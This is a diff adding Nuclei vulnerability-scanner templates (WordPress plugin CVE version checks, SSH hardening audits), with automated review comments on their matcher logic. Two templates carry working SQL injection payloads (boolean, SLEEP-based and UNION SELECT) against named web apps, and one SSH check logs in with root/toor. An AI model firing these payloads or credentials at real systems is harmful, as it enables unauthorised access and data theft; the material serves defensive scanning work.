+ part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml b/poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml new file mode 100644 index 0000000000..a28570e900 --- /dev/null +++ b/poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952 + +info: + name: > + Kata Plus – Addons for Elementor – Widgets, Extensions and Templates <= 1.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Kata Plus – Addons for Elementor – Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9376 + metadata: + fofa-query: "wp-content/plugins/kata-plus/" + google-query: inurl:"/wp-content/plugins/kata-plus/" + shodan-query: 'vuln:CVE-2024-9376' + tags: cve,wordpress,wp-plugin,kata-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kata-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kata-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml b/poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml new file mode 100644 index 0000000000..4bed1d573a --- /dev/null +++ b/poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca
+
+info:
+ name: >
+ Beaver Builder – WordPress Page Builder <= 2.8.4.2 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Button Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9505
+ metadata:
+ fofa-query: "wp-content/plugins/beaver-builder-lite-version/"
+ google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/"
+ shodan-query: 'vuln:CVE-2024-9505'
+ tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "beaver-builder-lite-version"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.4.2')
\ No newline at end of file
diff --git a/poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml b/poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml new file mode 100644 index 0000000000..bc6996c365 --- /dev/null +++ b/poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml @@ -0,0 +1,59 @@ +id: cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a + +info: + name: > + Contact Form 7 + Telegram <= 0.8.5 - Missing Authorization to Authenticated (Subscriber+) Subscription Approve/Pause/Refuse + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cf7-telegram/" + google-query: inurl:"/wp-content/plugins/cf7-telegram/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cf7-telegram,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-telegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-telegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.5') \ No newline at end of file diff --git a/poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml b/poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml new file mode 100644 index 0000000000..555227e3be --- /dev/null +++ b/poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml 
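Review bot: The `info` block is shipped half-filled: `description: >` has no body, `cvss-metrics:`, `cvss-score:` and `cve-id:` are blank, `shodan-query` is the bare `'vuln:'`, yet `tags` still carries `cve`, so the output has no classification and the cve tag is misleading; the hunks on L327, L339 and L340 have the same empty fields. Nothing in the hunk supports `severity: low` for a missing-authorization flaw (or, on L339, for an authenticated local file inclusion), so the severity looks like a template default rather than an assessment. Either fill the classification from the linked Wordfence entry or drop the `cve` tag and the empty `cve-id:`/`cvss-*` keys until an identifier exists, and give `description` at least one sentence naming what the version check stands in for.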
@@ -0,0 +1,59 @@
+id: move-addons-e750f1bb05d811fe0e3f213b39e81dbd
+
+info:
+ name: >
+ Move Addons for Elementor <= 1.3.5 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/move-addons/"
+ google-query: inurl:"/wp-content/plugins/move-addons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,move-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/move-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "move-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.5')
\ No newline at end of file
diff --git a/poc/sql/royal-event-management-system-sqli.yaml b/poc/sql/royal-event-management-system-sqli.yaml
new file mode 100644
index 0000000000..b1358ef078
--- /dev/null
+++ b/poc/sql/royal-event-management-system-sqli.yaml
@@ -0,0 +1,67 @@ +id: royal-event-management-system-sqli + +info: + name: Royal Event Management System 1.0 - 'todate' SQL Injection + author: eren-gozaydin + severity: high + description: Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + reference: + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + metadata: + version: 1 + tested-on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 + tags: cve,cve2022,sqli,royal-event,authenticated + +requests: + - method: POST + path: + - "{{BaseURL}}/royal_event/btndates_report.php#?=" + headers: + Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Cache-Control: no-cache + Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 + Referer: "{{BaseURL}}/royal_event/btndates_report.php#?=" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + body: | + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="todate" + + -1' OR 1=1 OR 'ns'='ns + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="search" + + 3 + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + --f289a6438bcc45179bcd3eb7ddc555d0-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "SQL syntax" + - "MySQL" + condition: or + - type: 
word + words: + - "Event Details Report" + part: body + + extractors: + - type: regex + part: body + regex: + - "(?i)(sql syntax|mysql syntax|unexpected token)" \ No newline at end of file diff --git a/poc/sql/xhibiter-nft-sqli.yaml b/poc/sql/xhibiter-nft-sqli.yaml new file mode 100644 index 0000000000..d788460ea0 --- /dev/null +++ b/poc/sql/xhibiter-nft-sqli.yaml @@ -0,0 +1,52 @@ +id: xhibiter-nft-sqli + +info: + name: Xhibiter NFT Marketplace SQL Injection + author: ProjectDiscoveryAI + severity: high + description: | + Xhibiter NFT Marketplace suffers from SQL Injection vulnerability in the 'id' parameter. + The vulnerability allows attackers to execute various types of SQL injection attacks including + boolean-based blind, time-based blind, and UNION query injections. + +http: + - raw: + - | + GET /collections?id=2' AND 4182=4182 AND 'rNfD'='rNfD HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "4182=4182" + part: body + - type: word + words: + - "rNfD=rNfD" + part: body + + - raw: + - | + GET /collections?id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration > 5" + + - raw: + - | + GET /collections?id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "qbbbq" + - "eTeuLPRMhOvIDCDXbNNYlaKmJVeIViFmKpCbfkX" + part: body \ No newline at end of file diff --git a/poc/sql_injection/royal-event-management-system-sqli.yaml b/poc/sql_injection/royal-event-management-system-sqli.yaml new file mode 100644 index 0000000000..b1358ef078 
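Review bot: The matcher set on this request cannot succeed on a vulnerable host: `matchers-condition: and` requires a database error signature (`"SQL syntax"` / `"MySQL"`) and the successful report page (`"Event Details Report"`) in the same response, but the `-1' OR 1=1 OR 'ns'='ns` payload is a boolean bypass that produces no error, so every result is a false negative. The hardcoded `Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380` is a session from the author's test instance; the template is tagged `authenticated` but gives the operator no way to supply a live session, so on any other target the request lands on the login page. `requests:` is the pre-v3 key (current templates use `http:`), and the `#?=` fragment in `path` and `Referer` is never sent to the server. Keep only the success-page matcher (or put the error words in a separate request), move the cookie into a template variable, and note that the identical file is added a second time under poc/sql_injection on L331–L332.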
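Review bot: The first request's matchers, `"4182=4182"` and `"rNfD=rNfD"`, only test that the page echoes the query string back, which is reflection rather than injection, and `rNfD=rNfD` does not even occur in the payload as sent (`'rNfD'='rNfD`), so that branch either never fires or fires on any page that echoes its parameters; a boolean test needs a true/false pair compared against each other. The time-based branch pairs `SLEEP(5)` with the strict `duration > 5` and no baseline request, so a slow target matches and a target that sleeps exactly 5 s may not; `duration >= 5` plus a baseline comparison is the usual shape. `info` has no `reference`, `tags`, `classification` or `metadata` for a `severity: high` template. The same file is added again under poc/sql_injection on L332.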
--- /dev/null +++ b/poc/sql_injection/royal-event-management-system-sqli.yaml 
@@ -0,0 +1,67 @@ +id: royal-event-management-system-sqli + +info: + name: Royal Event Management System 1.0 - 'todate' SQL Injection + author: eren-gozaydin + severity: high + description: Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + reference: + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + metadata: + version: 1 + tested-on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 + tags: cve,cve2022,sqli,royal-event,authenticated + +requests: + - method: POST + path: + - "{{BaseURL}}/royal_event/btndates_report.php#?=" + headers: + Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Cache-Control: no-cache + Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 + Referer: "{{BaseURL}}/royal_event/btndates_report.php#?=" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + body: | + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="todate" + + -1' OR 1=1 OR 'ns'='ns + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="search" + + 3 + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + --f289a6438bcc45179bcd3eb7ddc555d0-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "SQL syntax" + - "MySQL" + condition: or + - type: 
word + words: + - "Event Details Report" + part: body + + extractors: + - type: regex + part: body + regex: + - "(?i)(sql syntax|mysql syntax|unexpected token)" \ No newline at end of file diff --git a/poc/sql_injection/xhibiter-nft-sqli.yaml b/poc/sql_injection/xhibiter-nft-sqli.yaml new file mode 100644 index 0000000000..d788460ea0 --- /dev/null +++ b/poc/sql_injection/xhibiter-nft-sqli.yaml @@ -0,0 +1,52 @@ +id: xhibiter-nft-sqli + +info: + name: Xhibiter NFT Marketplace SQL Injection + author: ProjectDiscoveryAI + severity: high + description: | + Xhibiter NFT Marketplace suffers from SQL Injection vulnerability in the 'id' parameter. + The vulnerability allows attackers to execute various types of SQL injection attacks including + boolean-based blind, time-based blind, and UNION query injections. + +http: + - raw: + - | + GET /collections?id=2' AND 4182=4182 AND 'rNfD'='rNfD HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "4182=4182" + part: body + - type: word + words: + - "rNfD=rNfD" + part: body + + - raw: + - | + GET /collections?id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration > 5" + + - raw: + - | + GET /collections?id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "qbbbq" + - "eTeuLPRMhOvIDCDXbNNYlaKmJVeIViFmKpCbfkX" + part: body \ No newline at end of file diff --git a/poc/ssh/disable-ssh-forwarding.yaml b/poc/ssh/disable-ssh-forwarding.yaml new file mode 100644 index 0000000000..71a2693b6e --- /dev/null 
+++ b/poc/ssh/disable-ssh-forwarding.yaml
@@ -0,0 +1,24 @@
+id: disable-ssh-forwarding
+
+info:
+ name: Disable SSH Forwarding
+ author: pussycat0x
+ severity: info
+ description: |
+ Port forwarding enables a host to proxy for another, which is often unnecessary and can pose security risks. If your server has a GUI, disable X11 forwarding when using SSH, as it wasn't designed with security in mind.
+ remediation: |
+ Change it to : X11Forwarding no and AllowTcpForwarding no
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "AllowTcpForwarding yes"
+ - "X11Forwarding yes"
+ condition: or
diff --git a/poc/ssh/disable-ssh-protocol-1.yaml b/poc/ssh/disable-ssh-protocol-1.yaml
new file mode 100644
index 0000000000..eee1c591a9
--- /dev/null
+++ b/poc/ssh/disable-ssh-protocol-1.yaml
@@ -0,0 +1,24 @@
+id: disable-ssh-protocol-1
+
+info:
+ name: Disable SSH Protocol 1
+ author: pussycat0x
+ severity: info
+ description: |
+ SSH Protocol 1 is outdated and less secure. Ensure only Protocol 2 is used.
+ remediation: |
+ Ensure the following line is present: : Protocol 2
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.ktchost.com/blog/enable-ssh-protocol-2/
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "Protocol 2"
+ negative: true
\ No newline at end of file
diff --git a/poc/ssh/enable-ssh-privilege-separation.yaml b/poc/ssh/enable-ssh-privilege-separation.yaml
new file mode 100644
index 0000000000..948c61dff1
--- /dev/null
+++ b/poc/ssh/enable-ssh-privilege-separation.yaml
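Review bot: `words: - "AllowTcpForwarding yes"` / `"X11Forwarding yes"` match commented-out lines as well as active ones, and the stock OpenSSH sshd_config ships its defaults commented (`#AllowTcpForwarding yes`), so a server that has never enabled forwarding still matches. A regex matcher anchored to the start of an uncommented line, `(?mi)^\s*(AllowTcpForwarding|X11Forwarding)\s+yes`, fixes that and also covers sshd's case-insensitive keywords, which the case-sensitive word matcher does not. `extensions: - all` runs the check over every file under the scanned path rather than the sshd configuration, so any unrelated file containing the string is reported; the same two problems are in the L338 hunk (`PasswordAuthentication yes`).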
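Review bot: A `negative: true` word matcher combined with `extensions: - all` reports every file that does not contain `Protocol 2`, which is nearly every file on the host, not a misconfigured sshd_config; the hunks on L334 (`UsePrivilegeSeparation yes`, `AllowGroups`) and L335 (`AllowUsers`) have the same shape. The check is also obsolete: OpenSSH removed server-side protocol 1 in 7.4, so `Protocol` no longer appears in current configurations and its absence is the expected state rather than a finding. If the template is kept, gate the negative match behind a positive matcher that proves the file is an sshd configuration (`matchers-condition: and` with a word such as `Subsystem`), and say in `description` that the check only applies to pre-7.4 servers.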
@@ -0,0 +1,24 @@
+id: enable-ssh-privilege-separation
+
+info:
+ name: Enable Privilege Separation in SSH
+ author: pussycat0x
+ severity: info
+ description: |
+ Limits the impact of a compromise by isolating critical operations from less sensitive tasks.
+ remediation: |
+ Change it to : UsePrivilegeSeparation yes
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.stigviewer.com/stig/red_hat_enterprise_linux_9/2023-09-13/finding/V-258010
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "UsePrivilegeSeparation yes"
+ negative: true
\ No newline at end of file
diff --git a/poc/ssh/limit-ssh-group.yaml b/poc/ssh/limit-ssh-group.yaml
new file mode 100644
index 0000000000..cdbc4664a0
--- /dev/null
+++ b/poc/ssh/limit-ssh-group.yaml
@@ -0,0 +1,24 @@
+id: limit-ssh-group
+
+info:
+ name: Limit SSH Users Group Access
+ author: pussycat0x
+ severity: info
+ description: |
+ Limit SSH access to specific users.
+ remediation: |
+ Change it to : AllowUsers user1 user2
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://cloud.ibm.com/docs/ssh-keys?topic=ssh-keys-granting-ssh-access-to-a-user
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "AllowGroups"
+ negative: true
\ No newline at end of file
diff --git a/poc/ssh/limit-ssh-users-access.yaml b/poc/ssh/limit-ssh-users-access.yaml
new file mode 100644
index 0000000000..6ad6944932
--- /dev/null
+++ b/poc/ssh/limit-ssh-users-access.yaml
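Review bot: The remediation `Change it to : UsePrivilegeSeparation yes` recommends a directive that OpenSSH deprecated in 7.5 — privilege separation has been unconditional since then and sshd emits a deprecated-option warning when the keyword is present — so following it adds noise rather than hardening, and the `negative: true` matcher flags every current installation because the line is rightly absent. Either retire the template or reword `description` to say it only applies to OpenSSH releases older than 7.5 and make the remediation `No action on OpenSSH 7.5 or later; privilege separation is always enabled`.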
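Review bot: The remediation `Change it to : AllowUsers user1 user2` contradicts the matcher two blocks below it, which looks for `AllowGroups`; the text is copied from the users template and should read `Change it to : AllowGroups <admin-group>`. The description `Limit SSH access to specific users.` has the same copy-paste origin and should say groups, otherwise an operator reading the finding applies the wrong directive.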
@@ -0,0 +1,24 @@
+id: limit-ssh-users-access
+
+info:
+ name: Limit SSH Users Access
+ author: pussycat0x
+ severity: info
+ description: |
+ Limit SSH access to specific users.
+ remediation: |
+ Change it to : AllowUsers user1 user2
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://cloud.ibm.com/docs/ssh-keys?topic=ssh-keys-granting-ssh-access-to-a-user
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "AllowUsers"
+ negative: true
\ No newline at end of file
diff --git a/poc/ssh/ssh-audit.yaml b/poc/ssh/ssh-audit.yaml
new file mode 100644
index 0000000000..04edf1db40
--- /dev/null
+++ b/poc/ssh/ssh-audit.yaml
@@ -0,0 +1,80 @@
+id: ssh-audit
+
+info:
+ name: SSH - Audit
+ author: pussycat0x
+ severity: unknown
+ description: |
+ SSH (Secure Shell) is a critical tool for administering Linux servers remotely. However, its powerful capabilities also make it a prime target for attackers. SSH hardening refers to the process of strengthening SSH configuration and practices to protect against unauthorized access and potential security breaches.
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://github.com/projectdiscovery/nuclei-templates/tree/main/file/audit/ssh
+ tags: js,ssh,audit,network
+
+javascript:
+ - code: |
+ var m = require("nuclei/ssh");
+ var c = m.SSHClient();
+ c.Connect(Host,Port,Username,Password);
+ const sshConfig = c.Run('cat /etc/ssh/sshd_config')
+ sshConfig
+
+ let result = "";
+ if (sshConfig.includes('#Port 22') && !sshConfig.includes('Port ')) {
+ result += "Default SSH Port Detected; ";
+ }
+ if (sshConfig.includes('PermitEmptyPasswords yes')) {
+ result += "Disable SSH Empty Password Access; ";
+ }
+ if (sshConfig.includes('PermitRootLogin yes')) {
+ result += "Disable SSH Root Login; ";
+ }
+ if (sshConfig.includes('AllowTcpForwarding yes') && !sshConfig.includes('#AllowTcpForwarding yes') || sshConfig.includes('X11Forwarding yes')) {
+ result += "Disable SSH Forwarding; ";
+ }
+ if (!sshConfig.includes('Protocol 2')) {
+ result += "Disable SSH Protocol 1; ";
+ }
+ if (!sshConfig.includes('UsePrivilegeSeparation yes')) {
+ result += "Enable Privilege Separation in SSH; ";
+ }
+ if (!sshConfig.includes('PrintLastLog no')) {
+ result += "Hide SSH Last Login Information; ";
+ }
+ if (sshConfig.includes('#ClientAliveInterval') && sshConfig.includes('#ClientAliveCountMax') && !sshConfig.includes('ClientAliveInterval ') && !sshConfig.includes('ClientAliveCountMax ')){
+ result += "Set SSH Idle Timeout Interval; ";
+ }
+ if (sshConfig.includes('#MaxAuthTries') && !sshConfig.includes('MaxAuthTries ')){
+ result += "Set Maximum Limit SSH Authentication Attempts; ";
+ }
+ if (!sshConfig.includes('AllowGroups')){
+ result += "Set or Limit SSH Users Group Access; ";
+ }
+ if (!sshConfig.includes('AllowUsers')){
+ result += "Set or Limit SSH Users Access; ";
+ }
+ if (sshConfig.includes('#ListenAddress') && !sshConfig.includes('ListenAddress ')){
+ result += "Limit SSH Access by IP Address / Whitelist IP; ";
+ }
+ if (sshConfig.includes('#PasswordAuthentication yes') && !sshConfig.includes('PasswordAuthentication yes')){
+ result += "Setup/Use SSH Key-Based Authentication; ";
+ }
+
+ result
+
+ args:
+ Host: "{{Host}}"
+ Port: "22"
+ Username: "root"
+ Password: "toor"
+
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
diff --git a/poc/ssh/ssh-ip-whitelist.yaml b/poc/ssh/ssh-ip-whitelist.yaml
new file mode 100644
index 0000000000..cebf589dea
--- /dev/null
+++ b/poc/ssh/ssh-ip-whitelist.yaml
@@ -0,0 +1,23 @@
+id: ssh-ip-whitelist
+
+info:
+ name: Limit SSH Access by IP Address
+ author: pussycat0x
+ severity: info
+ description: |
+ Only specified IP addresses will be able to connect via SSH, reducing the risk of unauthorized access and it's Helps in mitigating brute-force attacks by limiting the attack surface
+ remediation: |
+ Change it to : ListenAddress 0.0.0.0
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.cyberciti.biz/tips/howto-openssh-sshd-listen-multiple-ip-address.html
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "#ListenAddress"
\ No newline at end of file
diff --git a/poc/ssh/ssh-key-auth-required.yaml b/poc/ssh/ssh-key-auth-required.yaml
new file mode 100644
index 0000000000..61496daad8
--- /dev/null
+++ b/poc/ssh/ssh-key-auth-required.yaml
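Review bot: Five of the checks can never fire because the commented default contains the active directive as a substring: `sshConfig.includes('#Port 22') && !sshConfig.includes('Port ')` is always false since `'#Port 22'` contains `'Port '`, and the same holds for `#ClientAliveInterval` / `ClientAliveInterval `, `#MaxAuthTries` / `MaxAuthTries `, `#ListenAddress` / `ListenAddress ` and `#PasswordAuthentication yes` / `PasswordAuthentication yes`. The forwarding test mixes `&&` and `||` without parentheses, so `X11Forwarding yes` is accepted even when it only appears in a comment, and the bare `sshConfig` statement after `c.Run` is a no-op. The robust shape is to drop comment lines first and match anchored directives against the remaining ones, as sketched below. Separately, `Username: "root"` / `Password: "toor"` are fixed in `args` and `success == true` is true for every host that accepts them, so the template should take its credentials from template variables and report only when `result` is non-empty.
```javascript
const sshConfig = c.Run('cat /etc/ssh/sshd_config')
// Only uncommented directives are in effect; OpenSSH ships its defaults
// commented out ("#Port 22"), and a substring test on the raw text cannot
// tell an active directive from its commented default.
const active = sshConfig.split('\n')
  .map(l => l.trim())
  .filter(l => l.length > 0 && !l.startsWith('#'));
const has = (re) => active.some(l => re.test(l));

let result = "";
if (!has(/^Port\s+\d+/i)) {
  result += "Default SSH Port Detected; ";
}
if (has(/^PermitEmptyPasswords\s+yes/i)) {
  result += "Disable SSH Empty Password Access; ";
}
if (has(/^AllowTcpForwarding\s+yes/i) || has(/^X11Forwarding\s+yes/i)) {
  result += "Disable SSH Forwarding; ";
}
if (!has(/^MaxAuthTries\s+\d+/i)) {
  result += "Set Maximum Limit SSH Authentication Attempts; ";
}
// … remaining checks rewritten the same way against `active` …
```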
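Review bot: The remediation `Change it to : ListenAddress 0.0.0.0` undoes the control the template is named for — `0.0.0.0` binds every interface — and should name the management address instead, e.g. `Change it to : ListenAddress <management-ip>`. The matcher `"#ListenAddress"` fires on the commented default line, which the stock sshd_config contains whether or not an active `ListenAddress` is also configured, so it cannot tell a restricted server from an unrestricted one; a negative match on `(?mi)^\s*ListenAddress\s+\S+` would express the intended check.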
@@ -0,0 +1,23 @@
+id: ssh-key-auth-required
+
+info:
